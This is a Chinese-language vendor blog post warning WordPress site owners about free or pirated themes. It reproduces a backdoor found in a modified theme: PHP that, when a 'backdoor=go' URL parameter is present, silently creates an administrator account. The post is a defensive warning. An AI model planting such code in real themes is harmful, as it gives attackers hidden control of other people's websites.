售前咨询
技术支持
渠道合作

警惕!wordpress慎重使用免费(盗版)主题

使用wordpress建站的站长朋友们不在少数,数安时代php虚拟主机就有很多wordpress的客户。一般我们使用wordpress建站,都是先安装一个开源程序,然后到网上选择一个我们喜欢或者适合的主题,进行安装。这些主题中,大部分都是免费的主题。这就可能涉及到一个问题,那就是安全问题。由于免费的主题大家都可以下载到,一些无良的商家专门收集这些主题,往主题里添加广告、暗链,甚至恶意代码,达到他们不可告人的秘密。最近数安时代小编就遇到了这样一个被人修改过的主题,添加的代码如下:

add_action('wp_head', 'holeinthewall'); 
function holeinthewall() { 
If ($_GET['backdoor'] == 'go') { 
require('wp-includes/registration.php'); 
If (!username_exists('username')) { 
$user_id = wp_create_user('username', 'password'); 
$user = new WP_User($user_id); 
$user->set_role('administrator'); 
} 
} 
}

以上主题小编请公司的程序员大神解释了一下,他给出的解释是:这竟然是一个自动添加管理员的代码!如果把上面的代码添加到functions.php文件中,会自动创建一个管理员,名为username,密码为password的管理账号!这样太恐怖了,如果真的创建成功,就可以任意修改网站内容了。

所以数安时代小编在这里给大家提个醒:最好不要使用免费或者盗版的主题,以免给自己的网站带来意想不到的麻烦。

 

上一篇:

下一篇:

相关新闻

 

领取优惠
免费预约

申请试用SSL证书

提交成功!

咨询客服